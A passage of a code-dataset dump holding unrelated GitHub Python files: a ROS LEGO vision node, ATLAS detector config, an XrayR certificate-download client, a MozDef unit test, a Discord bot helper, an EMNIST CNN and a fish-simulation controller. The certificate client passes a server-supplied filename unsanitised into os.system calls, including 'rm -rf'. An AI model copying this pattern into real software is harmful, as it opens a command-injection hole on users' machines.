:3] = camera_pose.orientation.rotation_matrix\n\n # Convert camera pose to numpy\n camera_pose.position = np.array((\n abs(camera_pose.position.x),\n abs(camera_pose.position.y),\n camera_pose.position.z), dtype=np.float64)\n # Convert quaternion to pyquaternion\n camera_pose.orientation = PyQuaternion(\n x=camera_pose.orientation.x,\n y=camera_pose.orientation.y,\n z=camera_pose.orientation.z,\n w=camera_pose.orientation.w\n )\n camera_view = (camera_info.width, camera_info.height)\n camera_matrix = np.array(camera_info.K).reshape((3, 3))\n dist_coeffs = np.array(camera_info.D)\n\n return camera_frame, camera_view, camera_matrix, dist_coeffs\n\n\ndef detect_yofo(image):\n pred = yofo(image).squeeze()\n clss = pred.argmax(dim=0, keepdim=True).flatten().cpu().item()\n conf = pred[clss].cpu().item()\n #clss = pred.sum(axis=0).argmax(dim=0, keepdim=True).flatten().cpu()\n #conf = pred.sum(axis=0)[clss].cpu().item()\n return clss, conf\n\n\ndef detect_yolo(image):\n pred = yolo(image).pandas()\n return pred\n\n\n###############################################################################\n# Callback\n###############################################################################\ndef camera_callback(image_color, image_depth, model_infos):\n global image_view\n image_color = CvBridge().imgmsg_to_cv2(image_color, \"bgr8\")\n depth = CvBridge().imgmsg_to_cv2(image_depth, \"32FC1\")\n\n # Convert depth map to rgb grayscale\n image_depth = -depth + depth.max()\n image_depth *= 255 / 0.20\n image_depth = cv2.cvtColor(image_depth, cv2.COLOR_GRAY2RGB)\n\n # CREATE THE ESTIMATED MODEL STATES MESSAGE\n estimated_model_states = ModelStates()\n\n res = detect_yolo(image_depth)\n for x1, y1, x2, y2, clss_conf, clss_id, clss_nm in res.xyxy[0].to_numpy()[:, :7]:\n if clss_conf < 0.65:\n continue\n\n x1, y1, x2, y2 = int(x1), int(y1), int(x2), int(y2)\n\n # crop the depth image from the bounding box\n depth_crop = depth[y1:y2, x1:x2]\n depth_crop_max = depth_crop.max()\n depth_crop_min = depth_crop.max()\n\n model_info = model_infos[clss_id]\n\n # Find the contour of the object\n thresh = depth_crop_max - 0.005\n rect, angle, depth_crop = my_utils.min_area_crop(depth_crop, thresh)\n if depth_crop is None: # Object was not found\n continue\n\n # Resize the cropped depth image to a 32x32 image\n depth_crop = cv2.resize(depth_crop, (32, 32), interpolation=cv2.INTER_NEAREST)\n depth_crop = np.expand_dims(depth_crop, axis=(0, 3))\n\n # Infer pose using custom model\n pose_id, pose_conf = detect_yofo(torch.from_numpy(depth_crop))\n\n model_size = model_info[\"size\"]\n\n # Get the camera facing axis of the object\n model_height = depth_crop_max - depth_crop_min\n if pose_id == 0: # up\n axis = 2\n elif pose_id == 1: # down\n axis = 2\n else:\n if model_height < model_size[0] + 0.005:\n axis = 0\n else:\n axis = 1\n\n # Find the x-y-z coordinates of the object\n model_xyz = np.array(\n [int(rect[0][0] + x1),\n int(rect[0][1] + y1),\n depth_crop_max + model_height/2,\n 1],\n dtype=np.float32)\n model_xyz[:2] /= image_color.shape[1], image_color.shape[0]\n model_xyz[:2] -= 0.5\n #model_xyz[:2] -= model_xyz[:2]*2*0.02 # correct for perspective\n model_xyz[:2] *= (0.900, 0.900)\n model_xyz = np.dot(camera_frame, model_xyz)\n\n # Calculate xy-plane rotation mod 180°\n rotZ = - rect[2] / 90 * (math.pi/2)\n horizontal = rect[1][0] < rect[1][1] # rect long side is along x-axis\n\n # Calculate the object quaternion\n if pose_id == 0: # UP\n rotZ = rotZ if horizontal else rotZ + math.pi / 2\n quat = PyQuaternion(axis=(0, 0, 1), angle=0) # z-axis along world-frame z-axis\n elif pose_id == 1: # DOWN\n rotZ = rotZ if horizontal else rotZ + math.pi / 2\n quat = PyQuaternion(axis=(0, 1, 0), angle=math.pi) # z-axis along world-frame negative z-axis\n elif pose_id == 2: # NORTH\n quat = PyQuaternion(axis=(1, 0, 0), angle=math.pi/2)\n rotZ += 0\n elif pose_id == 3: # SOUTH\n quat = PyQuaternion(axis=(1, 0, 0), angle=math.pi/2)\n rotZ += math.pi\n elif pose_id == 4: # EAST\n quat = PyQuaternion(axis=(1, 0, 0), angle=math.pi/2)\n rotZ += -math.pi/2\n elif pose_id == 5: # WEST\n quat = PyQuaternion(axis=(1, 0, 0), angle=math.pi/2)\n rotZ += math.pi/2\n else:\n raise ValueError(\"Unknown pose id: {}\".format(pose_id))\n if axis == 0:\n quat *= PyQuaternion(axis=(0, 0, 1), angle=math.pi / 2)\n else:\n pass\n quat = PyQuaternion(axis=(0, 0, 1), angle=rotZ) * quat # apply x-y world plane rotation\n\n # Store the estimated pose\n estimated_model_states.name.append(model_info[\"name\"])\n estimated_model_states.pose.append(Pose(\n Point(*model_xyz[:3]),\n quat\n ))\n\n \"\"\"\n VISUALIZATION\n \"\"\"\n rot_tra = np.zeros((4, 4), dtype=np.float64)\n # Rotation matrix\n rot_tra[:3, :3] = quat.rotation_matrix\n # Trasform matrix\n rot_tra[:4, 3] = (*model_xyz[:3], 1.0)\n\n # Axes of the model\n axes = np.ones((4, 4), dtype=np.float64)\n axes[:, :3] = np.array([\n [0, 0, 0], # origin\n [.1, 0, 0], # x\n [0, .1, 0], # y\n [0, 0, .1]]) # z\n axes = np.dot(rot_tra, axes.T)[:3, :]\n (axes_2dproj, _) = cv2.projectPoints(\n axes,\n camera_frame[:3, :3], abs(camera_frame[:3, 3]),\n camera_matrix, dist_coeffs)\n axes_2dproj = axes_2dproj.reshape(-1, 2).astype(np.int32)\n\n cv2.line(image_color,\n axes_2dproj[0],\n axes_2dproj[1],\n (0, 0, 255), 2) # B G R\n cv2.line(image_color,\n axes_2dproj[0],\n axes_2dproj[2],\n (0, 255, 0), 2)\n cv2.line(image_color,\n axes_2dproj[0],\n axes_2dproj[3],\n (255, 0, 0), 2)\n\n # visualize the yolo bounding box\n # cv2.rectangle(image_show, (x1, y1), (x2, y2), (0, 255, 0), 2)\n\n # visualize the rotated bounding box\n box = np.int0(cv2.boxPoints(rect) + (x1, y1))\n cv2.drawContours(image_color, [box], 0, (0, 0, 255), 2)\n\n # visualize the pose\n text = f\"{POSES[pose_id]} {pose_conf:.2f}\"\n cv2.putText(image_color, text, (x1, y1-5), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 0), 1)\n\n # visualize the class\n text = f\"{model_info['name']} {clss_conf:.2f}\"\n cv2.putText(image_color, text, (x1, y2+10), cv2.FONT_HERSHEY_PLAIN, 1, (0, 0, 0), 1)\n\n # Send the estimated model poses\n pub_model_states.publish(estimated_model_states)\n image_view = image_color\n\n\nif __name__ == \"__main__\":\n # Ignore warnings due to YOLOv5 spamming the console when running on CPU\n warnings.simplefilter(\"ignore\")\n\n # Setting default device for pytorch\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n torch.set_grad_enabled(False)\n\n print(\"Initializing vision node\")\n rospy.init_node(\"lego_builder_vision\")\n\n print(\" Loading camera sensor parameters\")\n camera_frame, camera_view, camera_matrix, dist_coeffs = init(\"kinect\")\n\n print(\" Loading pytorch models\")\n yolo = torch.hub.load(\n f\"{PKG_PATH}/yolo/yolov5\",\n \"custom\",\n path=f\"{PKG_PATH}/yolo/best.20epoch.pt\",\n force_reload=True,\n device=device,\n source=\"local\").eval()\n print(f\" + Loaded YOLO on {device}\")\n\n yofo = Yofo().eval()\n yofo.load_state_dict(torch.load(f\"{PKG_PATH}/yofo/last.pt\", map_location=device))\n print(f\" + Loaded YOFO on {device}\")\n\n print(f\" Loading 3D models dimensions\")\n model_infos = []\n for model in MODELS:\n model_infos.append({\n \"name\": model,\n \"size\": my_utils.get_model_size(f\"lego_{model}\", f\"{PKG_PATH}/../models\")\n })\n\n print(f\" Initializing ROS publisher and ROS subscriber\")\n pub_model_states = rospy.Publisher(\"estimated_model_states\", ModelStates, queue_size=1)\n\n sub_image_color = message_filters.Subscriber(\"/camera/color/image_raw\", Image)\n sub_image_depth = message_filters.Subscriber(\"/camera/depth/image_raw\", Image)\n ts = message_filters.TimeSynchronizer([sub_image_color, sub_image_depth], 1, reset=True) # exact sync\n ts.registerCallback(camera_callback, model_infos)\n\n rate = rospy.Rate(1)\n image_view = np.zeros((camera_view[1], camera_view[0], 3), dtype=np.uint8)\n print(f\"Starting main loop...\")\n # Visualize results from camera_callback\n while not rospy.is_shutdown():\n cv2.imshow(\"Predictions\", image_view)\n cv2.waitKey(1)\n rate.sleep()\n","repo_name":"zabealbe/lego-builder","sub_path":"src/lego_builder/lego_builder_vision/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10853,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"71097274433","text":"from AthenaConfiguration.ComponentAccumulator import ComponentAccumulator\nfrom AthenaConfiguration.ComponentFactory import CompFactory\nfrom SCT_Cabling.SCT_CablingConfig import SCT_CablingToolCfg\nfrom SCT_ConditionsTools.SCT_ConditionsToolsConfig import SCT_ConfigurationConditionsToolCfg\nfrom SCT_GeoModel.SCT_GeoModelConfig import SCT_ReadoutGeometryCfg\n\n\ndef SCT_RodDecoderCfg(flags, prefix=\"InDet\", suffix=\"\", **kwargs):\n acc = ComponentAccumulator()\n acc.merge(SCT_ReadoutGeometryCfg(flags))\n kwargs.setdefault(\"SCT_CablingTool\", acc.popToolsAndMerge(SCT_CablingToolCfg(flags)))\n kwargs.setdefault(\"ConfigTool\", acc.popToolsAndMerge(SCT_ConfigurationConditionsToolCfg(flags)))\n acc.setPrivateTools(CompFactory.SCT_RodDecoder(name=prefix+\"SCTRodDecoder\"+suffix,\n **kwargs))\n return acc\n\n\ndef SCTRawDataProviderToolCfg(flags, prefix=\"InDet\", suffix=\"\", **kwargs):\n acc = ComponentAccumulator()\n kwargs.setdefault(\"Decoder\", acc.popToolsAndMerge(SCT_RodDecoderCfg(flags, prefix=prefix, suffix=suffix)))\n acc.setPrivateTools(CompFactory.SCTRawDataProviderTool(name=prefix+\"SCTRawDataProviderTool\"+suffix,\n **kwargs))\n return acc\n\n\ndef SCTRawDataProviderCfg(flags, prefix=\"InDet\", suffix=\"\", **kwargs):\n \"\"\" Configures the main algorithm for SCT raw data decoding \"\"\"\n acc = ComponentAccumulator() \n kwargs.setdefault(\"ProviderTool\", acc.popToolsAndMerge(SCTRawDataProviderToolCfg(flags, prefix, suffix)))\n acc.addEventAlgo(CompFactory.SCTRawDataProvider(name=prefix+\"SCTRawDataProvider\"+suffix,\n **kwargs))\n return acc\n\n\n\ndef TrigSCTRawDataProviderCfg(flags, suffix, RoIs):\n \"\"\" Configures the SCT raw data decoding with trigger args \"\"\"\n\n from RegionSelector.RegSelToolConfig import regSelTool_SCT_Cfg\n\n regSelAcc = regSelTool_SCT_Cfg(flags)\n regSelTools = regSelAcc.popPrivateTools()\n trigargs = {\n 'prefix' : 'Trig',\n 'suffix' : suffix,\n 'RegSelTool' : regSelTools,\n 'RDOKey' : 'SCT_RDOs',\n 'RoIs' : RoIs, \n 'isRoI_Seeded': True,\n 'RDOCacheKey' : 'SctRDOCache',\n 'BSErrCacheKey' : 'SctBSErrCache'\n }\n\n dataPrepAcc = SCTRawDataProviderCfg(flags, **trigargs)\n dataPrepAcc.merge(regSelAcc)\n return dataPrepAcc\n\ndef SCTOverlayRawDataProviderCfg(flags, prefix=\"InDet\", suffix=\"\", **kwargs):\n \"\"\" Configures the main algorithm for SCT raw data decoding for data overlay \"\"\"\n kwargs.setdefault(\"RDOKey\", flags.Overlay.BkgPrefix + \"SCT_RDOs\")\n kwargs.setdefault(\"LVL1IDKey\", flags.Overlay.BkgPrefix + \"SCT_LVL1ID\")\n kwargs.setdefault(\"BCIDKey\", flags.Overlay.BkgPrefix + \"SCT_BCID\")\n return SCTRawDataProviderCfg(flags, prefix, suffix, **kwargs)\n\n\ndef SCTEventFlagWriterCfg(flags, prefix=\"InDet\", suffix=\"\", **kwargs):\n acc = ComponentAccumulator()\n acc.addEventAlgo(CompFactory.SCTEventFlagWriter(name=prefix+\"SCTEventFlagWriter\"+suffix,\n **kwargs))\n return acc\n","repo_name":"Yusuf-Manjra/athena","sub_path":"InnerDetector/InDetEventCnv/SCT_RawDataByteStreamCnv/python/SCT_RawDataByteStreamCnvConfig.py","file_name":"SCT_RawDataByteStreamCnvConfig.py","file_ext":"py","file_size_in_byte":3126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72708722753","text":"import requests\nimport os\nimport time\nimport logging\nSERVER_URL = \"https://cert/api/v1/\"\nTOKEN = \"your token\"\nCERT_FILE_NAME = \"cert\"\nLOCAL_PATH = os.path.dirname(os.path.abspath(__file__))\nTIMESTAMP = str(int(time.time()))\nMOVE_PATH = \"/etc/XrayR/cert\"\nTMP_PATH = \"/tmp/cert\"+TIMESTAMP+\"/\"\n\nlogging.basicConfig(format='%(asctime)s:%(levelname)s:%(message)s-----client:CertDownloader', level=logging.INFO,filename=LOCAL_PATH+'/log')\n\ndef move_cert(fname):\n logging.info(\"move cert\")\n if os.path.exists(MOVE_PATH):\n if os.path.exists(MOVE_PATH+\"_\"+\"bak\"):\n os.system(\"rm -rf \"+MOVE_PATH+\"_\"+\"bak\")\n os.rename(MOVE_PATH,MOVE_PATH+\"_\"+\"bak\")\n os.mkdir(MOVE_PATH)\n os.system(\"unzip \"+LOCAL_PATH+\"/cert/\"+fname+\" -d \"+TMP_PATH)\n try:\n os.system(\"mv \"+TMP_PATH+\"fullchain.pem \"+MOVE_PATH+\"/fullchain.pem\")\n os.system(\"mv \"+TMP_PATH+\"privkey.pem \"+MOVE_PATH+\"/privkey.pem\")\n except:\n logging.warning(\"move cert error\")\n logging.info(\"move cert success\")\n os.system(\"rm -rf \"+TMP_PATH)\n restart_xrayr=os.popen(\"XrayR restart\")\n if \"成功\" in restart_xrayr.read():\n logging.info(\"restart xrayr success\")\n else:\n logging.warning(\"restart xrayr error\")\n restart_xrayr.close()\n\n \n \ndef flag_set():\n if not os.path.exists(LOCAL_PATH+\"/cert\"):\n os.mkdir(LOCAL_PATH+\"/cert\")\n for root, dirs, files in os.walk(LOCAL_PATH+\"/cert\"):\n if len(files) == 0:\n logging.info(\"no local files\")\n return True\n elif len(files) == 1:\n logging.info(\"one local file\")\n if files[0].split(\"_\")[0] == CERT_FILE_NAME:\n logging.info(\"file name match\")\n return files[0]\n\ndef main():\n IN_UPDATE = False\n logging.info(\"update cert\")\n download_flag = flag_set()\n if download_flag==True:\n logging.info(\"download cert by first time\")\n r = requests.get(SERVER_URL+CERT_FILE_NAME+\"_\"+TIMESTAMP, params={\"token\": TOKEN,\"download\":True})\n elif download_flag==None:\n return logging.info(\"download_flag is None[file in cert folder are more than one]\")\n else:\n logging.info(\"check update by timestamp\")\n IN_UPDATE = True\n r = requests.get(SERVER_URL+download_flag.split(\".\")[0], params={\"token\": TOKEN})\n if r.status_code == 200 and \"error\" not in r.text:\n fname = r.headers[\"content-disposition\"].split(\";\")[1].split(\"=\")[1].replace('\"', '')\n if IN_UPDATE: os.remove(LOCAL_PATH+\"/cert/\"+download_flag)\n with open(LOCAL_PATH+\"/cert/\"+fname, \"wb\") as f:\n f.write(r.content)\n logging.info(\"download success\")\n move_cert(fname)\n else:\n msg=\"have error or status code not 200: \"+str(r.status_code)+\":\"+r.text\n logging.info(msg)\n\nif __name__ == \"__main__\":\n main()\n # https://cert/api/v1/cert_16687041030?token=\n","repo_name":"yuanweize/CertDeliver","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16934447295","text":"from datetime import datetime\n\nimport alerts.geomodel.alert as alert\nimport alerts.geomodel.factors as factors\n\n\nclass MockMMDB:\n '''Mocks a MaxMind database connection with a dictionary of records mapping\n IP adresses to dictionaries containing information about ASNs.\n '''\n\n def __init__(self, records):\n self.records = records\n\n def get(self, ip):\n return self.records.get(ip)\n\n def close(self):\n return\n\n\ndef null_origin(ip):\n return alert.Origin(\n ip=ip,\n city='Null',\n country='NA',\n latitude=0.0,\n longitude=0.0,\n observed=datetime.now(),\n geopoint='0.0,0.0')\n\n\n# A set of records for a mocked MaxMind database containing information about\n# ASNs used to test the `asn_movement` factor implementation with.\nasn_mvmt_records = {\n '1.2.3.4': {\n 'autonomous_system_number': 54321,\n 'autonomous_system_organization': 'CLOUDFLARENET'\n },\n '4.3.2.1': {\n 'autonomous_system_number': 12345,\n 'autonomous_system_organization': 'MOZILLA_SFO1'\n },\n '5.6.7.8': {\n 'autonomous_system_number': 67891,\n 'autonomous_system_organization': 'AMAZONAWSNET'\n }\n}\n\n\ndef test_asn_movement():\n factor = factors.asn_movement(\n MockMMDB(asn_mvmt_records),\n 'WARNING')\n\n test_hops = [\n alert.Hop(\n origin=null_origin('1.2.3.4'),\n destination=null_origin('4.3.2.1')),\n alert.Hop(\n origin=null_origin('4.3.2.1'),\n destination=null_origin('5.6.7.8'))\n ]\n\n test_alert = alert.Alert(\n username='tester',\n hops=test_hops,\n severity='INFO',\n factors=[])\n\n pipeline = [factor]\n\n modified_alert = factors.pipe(test_alert, pipeline)\n\n assert modified_alert.username == test_alert.username\n assert modified_alert.severity == 'WARNING'\n assert len(modified_alert.factors) == 1\n assert 'asn_hops' in modified_alert.factors[0]\n assert len(modified_alert.factors[0]['asn_hops']) == 2\n\n asn_key = 'autonomous_system_organization'\n asn1 = modified_alert.factors[0]['asn_hops'][0][0][asn_key]\n asn2 = modified_alert.factors[0]['asn_hops'][0][1][asn_key]\n asn3 = modified_alert.factors[0]['asn_hops'][1][0][asn_key]\n asn4 = modified_alert.factors[0]['asn_hops'][1][1][asn_key]\n\n assert asn1 == 'CLOUDFLARENET'\n assert asn2 == 'MOZILLA_SFO1'\n assert asn3 == 'MOZILLA_SFO1'\n assert asn4 == 'AMAZONAWSNET'\n","repo_name":"mozilla/MozDef","sub_path":"tests/alerts/geomodel/test_factors.py","file_name":"test_factors.py","file_ext":"py","file_size_in_byte":2475,"program_lang":"python","lang":"en","doc_type":"code","stars":2170,"dataset":"github-code","pt":"61"} +{"seq_id":"24666056054","text":"\"\"\"For interacting with the Discord API\"\"\"\n\nimport asyncio\nimport logging\nfrom urllib.parse import quote\n\nimport aiohttp\nimport hikari\nfrom sanic.exceptions import BadRequest, NotFound\n\nfrom munchi.config import Config\nfrom munchi.db import Database\n\nconfig = Config()\ndb = Database().db\nrest = hikari.RESTApp()\n\n\nasync def get_guild(guild: int) -> dict:\n \"\"\"Get a guild (as bot)\"\"\"\n headers = {\"Authorization\": f\"Bot {config.token}\"}\n\n async with aiohttp.ClientSession() as session:\n async with await session.get(\n f\"https://discord.com/api/v10/guilds/{guild}?with_counts=true\",\n headers=headers,\n ) as resp:\n resp.raise_for_status()\n data = await resp.json()\n\n async with await session.get(\n f\"https://discord.com/api/v10/guilds/{guild}/channels\",\n headers=headers,\n ) as resp:\n resp.raise_for_status()\n data[\"channels\"] = await resp.json()\n\n return data\n\n\nasync def get_user_guild(guild_id, token) -> dict:\n \"\"\"Get a user's guild via the bot (Uses user's token to check if bot is in guild)\"\"\"\n async with rest.acquire(token) as client:\n g = None\n\n # Check if user has and can manage guild\n for guild in await client.fetch_my_guilds():\n if guild.my_permissions.all(guild.my_permissions.MANAGE_GUILD) and str(\n guild.id\n ) == str(guild_id):\n g = guild\n break\n\n if not g:\n return\n\n # Get guild information from bot\n return await get_guild(guild_id)\n\n\nasync def get_token(code: str) -> str:\n \"\"\"Get token from code\"\"\"\n async with aiohttp.ClientSession() as session:\n async with await session.post(\n \"https://discord.com/api/v10/oauth2/token\",\n data={\n \"client_id\": config.application_id,\n \"client_secret\": config.client_secret,\n \"grant_type\": \"authorization_code\",\n \"code\": code,\n \"redirect_uri\": config.redirect_uri,\n },\n ) as resp:\n logging.debug(\"ERROR\", await resp.json())\n\n if resp.status != 200:\n raise BadRequest(str(await resp.json()))\n\n return (await resp.json())[\"access_token\"]\n\n\nasync def member_in_guild(guild: int, member: int) -> bool:\n \"\"\"Check if member is in guild\"\"\"\n # TODO: Use v10 API (I don't know how to do this with intents yet)\n headers = {\"Authorization\": f\"Bot {config.token}\"}\n\n async with aiohttp.ClientSession() as session:\n async with await session.get(\n f\"https://discord.com/api/v6/guilds/{guild}/members/{member}\",\n headers=headers,\n ) as resp:\n if resp.status in (403, 404):\n return False\n\n resp.raise_for_status()\n\n return True\n\n\nasync def get_user_guild_and_db(guild_id, token):\n guild = await get_user_guild(guild_id, token)\n\n if not guild:\n raise NotFound(\"Guild not found\")\n\n query = {\"guild\": guild_id}\n server = await db[\"server\"].find_one(query)\n\n if not server:\n await db[\"server\"].insert_one(query)\n server = await db[\"server\"].find_one(query)\n\n return guild, server, query\n\n\nasync def process_reaction_message(message):\n channel_id = message[\"channel\"]\n message_id = message[\"message\"]\n reactions = message[\"roles\"]\n\n for reaction in reactions.keys():\n headers = {\"Authorization\": f\"Bot {config.token}\"}\n\n status = None\n\n async with aiohttp.ClientSession() as session:\n # Retry in case of rate limit\n while not status or status == 429:\n status = (\n await session.put(\n f\"https://discord.com/api/v10/channels/{channel_id}/messages/{message_id}/reactions/{quote(reaction)}/@me\",\n headers=headers,\n )\n ).status\n\n asyncio.sleep(0.25)\n","repo_name":"wxllow/munchi","sub_path":"dashboard/backend/discord.py","file_name":"discord.py","file_ext":"py","file_size_in_byte":4025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"285077033","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Flatten\nfrom keras.layers.convolutional import Conv2D, MaxPooling2D\nfrom keras.utils import np_utils\nfrom keras import backend as K\nK.set_image_dim_ordering('th')\nimport matplotlib.pyplot as plt\nfrom scipy import io as spio\nimport numpy as np\n\n\n# In[2]:\n\n\n#loading data\nemnist = spio.loadmat(\"Data/emnist-letters.mat\")\n#Dataset structure \n#emnist[dataset][0][0][0][0][0][0] this is the array for the image pixel values\n#emnist[dataset][0][0][0][0][0][1] this is the array for the labels of the image\n#emnist[dataset][0][0][1][0][0][0] this is the array for the test image pixel values\n#emnist[dataset][0][0][1][0][0][1] this is the array for the labels of the test images\n\n\n# In[3]:\n\n\nx_train = emnist[\"dataset\"][0][0][0][0][0][0] #training images\nx_train = x_train.astype(np.float32)\ny_train = emnist[\"dataset\"][0][0][0][0][0][1] #training labels\n\n\n# In[4]:\n\n\nx_test = emnist[\"dataset\"][0][0][1][0][0][0] #test images\nx_test = x_test.astype(np.float32)\ny_test = emnist[\"dataset\"][0][0][1][0][0][1] #test labels\n\n\n# In[5]:\n\n\ntrain_labels = y_train\ntest_labels = y_test\n\n\n# In[6]:\n\n\n#normalize the test and train \nx_train /= 255\nx_test /= 255\n\n\n# In[7]:\n\n\nx_train.shape[0]\n\n\n# In[8]:\n\n\nx_test.shape[0]\n\n\n# In[9]:\n\n\nx_train = x_train.reshape(x_train.shape[0], 1, 28, 28, order = \"A\")\nx_test = x_test.reshape(x_test.shape[0], 1, 28, 28, order = \"A\")\n\n\n# In[10]:\n\n\nx_train.shape\n\n\n# In[11]:\n\n\ny_train.shape\n\n\n# In[12]:\n\n\n#encode the labels aka make it into an array of zeros and ones\ny_train = np_utils.to_categorical(y_train)\ny_test = np_utils.to_categorical(y_test)\n\n\n# In[13]:\n\n\ny_train.shape\n\n\n# In[14]:\n\n\ny_train[0]\n\n\n# In[20]:\n\n\n#confirm the data is loaded correctly\nsample = 5437\nimg = x_train[sample]\nplt.imshow(img[0], cmap = 'gray')\n\n\n# In[21]:\n\n\n#confirm label is correct\ntrain_labels[sample][0]\n\n\n# In[23]:\n\n\nnum_classes = y_test.shape[1]\n\n\n# In[26]:\n\n\n#create model\nmodel = Sequential()\nlayer1 = Conv2D(30,(5,5), input_shape = (1,28,28), activation = 'relu', name = 'layer1')\nmodel.add(layer1)\nmodel.add(MaxPooling2D(pool_size=(2,2)))\nlayer2 = Conv2D(15, (3,3), activation='relu', name = 'layer2')\nmodel.add(layer2)\nmodel.add(MaxPooling2D(pool_size = (2,2)))\nmodel.add(Dropout(0.2))\nmodel.add(Flatten())\nmodel.add(Dense(128, activation = 'relu'))\nmodel.add(Dense(50, activation = 'relu'))\nmodel.add(Dense(num_classes, activation='softmax'))\n#compile model\nmodel.compile(loss = 'categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\nmodel.summary()\n\n\n# In[36]:\n\n\nmodel.fit(x_train, y_train, validation_data=(x_test, y_test), epochs = 6, batch_size = 1000)\n\n\n# In[37]:\n\n\nscores = model.evaluate(x_test, y_test, verbose=0)\nprint(\"Large CNN Error = %.2f%%\" % (100-scores[1]*100))\n\n","repo_name":"holdenDuncan/SLUAVLegacyCode","sub_path":"imageProcessing/classification/EMNIST.py","file_name":"EMNIST.py","file_ext":"py","file_size_in_byte":2805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34970789693","text":"from src.ui.parameter_ui_challenge_simulation import Parameter_UI\nfrom src.models.arena import Arena\nfrom src.models.fish import Fish\nfrom src.models.leader_robot import LeaderRobot\nfrom src.models.agent import (\n attract,\n repulse,\n align,\n check_in_radii_vision,\n normalize,\n get_zone_neighbours,\n)\nfrom src.util.util import Util\nfrom src.util.serialize import serialize\n\nimport random\nimport time\nimport queue\nimport os\nimport sys\nimport logging\nimport numpy as np\nimport yaml # pyyaml\nfrom pathlib import Path\nfrom scipy.spatial import distance_matrix\nfrom logging.handlers import TimedRotatingFileHandler\nfrom datetime import datetime\n\npath_root = Path(__file__).parents[1]\nsys.path.append(str(path_root))\n\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import pyqtSignal, QObject\n\nFORMAT = \"\\t%(asctime)s - %(name)s - %(levelname)s - %(message)s\"\n\n# setup logging\nlogging.basicConfig(format=FORMAT, level=logging.INFO)\nnumba_logger = logging.getLogger(\"numba\")\nnumba_logger.setLevel(logging.WARNING)\n\nnp.warnings.filterwarnings(\"error\", category=np.VisibleDeprecationWarning)\n\n\nclass Behavior(QObject):\n \"\"\"\n Controller class of the challenge simulation. In the event loop, it handles the agents movement.\n This class does not connect to RoboTracker or Unity.\n \"\"\"\n\n update_positions = pyqtSignal(list, name=\"update_positions\")\n update_ellipses = pyqtSignal(LeaderRobot, list, name=\"update_ellipses\")\n\n def __init__(self, layout=None, DEBUG_VIS=None, config=None):\n super().__init__()\n\n self.world = None\n self.target = None\n\n self.parameter_ui = None\n\n # load config\n self.config = config\n if self.config is None:\n path = (Path(__file__).parents[1]) / \"cfg/config.yml\"\n logging.info(f\"BEHAVIOR: config path: {path}\")\n self.config = yaml.safe_load(open(path))\n # setup logging\n formatter = logging.Formatter(\n \"\\t%(asctime)s - %(name)s - %(levelname)s - %(message)s\"\n )\n\n logger = logging.getLogger()\n handler = TimedRotatingFileHandler(\n Path.home() / self.config[\"LOGGING\"][\"BEHAVIOR\"], when=\"H\", interval=1\n )\n handler.setFormatter(formatter)\n handler.setLevel(logging.INFO)\n logger.addHandler(handler)\n\n # setup util\n self.util = Util(self.config)\n # setup debug visualization\n self.debug_vis = DEBUG_VIS\n\n # setup default parameters\n self.default_num_fish = self.config[\"DEFAULTS\"][\"number_of_fish\"]\n self.optimisation = self.config[\"DEBUG\"][\"optimisation\"]\n\n self.zoa = self.config[\"DEFAULTS\"][\"zoa\"]\n self.zoo = self.config[\"DEFAULTS\"][\"zoo\"]\n self.zor = self.config[\"DEFAULTS\"][\"zor\"]\n\n # time step in seconds\n self.time_step = self.config[\"DEFAULTS\"][\"time_step\"]\n\n # logging\n self.setup_logging()\n\n # arena\n self.arena = Arena(\n [0, 0], self.config[\"ARENA\"][\"width\"], self.config[\"ARENA\"][\"height\"]\n )\n self.middle_pos = [self.arena.width / 2, self.arena.height / 2]\n self.middle_pos_cm = self.util.map_px_to_cm(self.middle_pos)\n\n # initialize robot\n self.behavior_robot = LeaderRobot(self.arena, self.config)\n # self.controlled = False\n self.trigger_next_robot_step = False\n self.flush_robot_target = False\n self.action = []\n self.just_started = False\n\n # initialize fish\n self.reset_fish(self.config[\"DEFAULTS\"][\"number_of_fish\"])\n\n # numba\n self.initiate_numba()\n\n self.parent_layout = (\n layout if self.debug_vis is not None else self.setup_parameter_layout()\n )\n\n # setup parameter ui widget\n self.setup_parameter_ui() # fill parameter layout\n\n # step logger\n self._step_logger = []\n self.exec_time = 0\n self.exec_stepper = 0\n\n self.last_time = datetime.now()\n\n # setup command queue\n self.com_queue = queue.LifoQueue()\n\n # setup debug vis\n if self.debug_vis is not None:\n self.setup_debug_vis()\n\n # catch key events\n if self.debug_vis is not None:\n app = QApplication.instance()\n app.installEventFilter(self)\n self.movelist = []\n\n self.turn_left = False\n self.turn_right = False\n\n logging.info(\"Behavior: Initialized!\")\n\n def initiate_numba(self) -> None:\n \"\"\"\n Initially executes reused functions sped up by JIT compiler numba\n \"\"\"\n repulse(np.asarray([[0.0, 0.0]]), np.asarray([0, 0]))\n align(np.asarray([[0.0, 0.0]]))\n attract(np.asarray([[0.0, 0.0]]), np.asarray([0, 0]))\n check_in_radii_vision(\n np.asarray([[0.0, 0.0]]),\n np.asarray([[0.0, 0.0]]),\n np.asarray([[0.0, 0.0]]),\n 0.0,\n np.asarray([0.0, 0.0]),\n np.asarray([0.0, 0.0]),\n )\n get_zone_neighbours(\n np.asarray([1.4, 2.0, 43.0321, 4214.3123, 2.5]),\n np.zeros((5, 2)),\n np.zeros((5, 2)),\n 10,\n 50,\n 150,\n )\n normalize(np.asarray([1.4, 2.0]))\n\n def setup_logging(self) -> None:\n now = datetime.now()\n formatter = logging.Formatter(\"%(asctime)s -8s %(message)s\")\n self.fish_logger = logging.getLogger(\"fish_logger\")\n 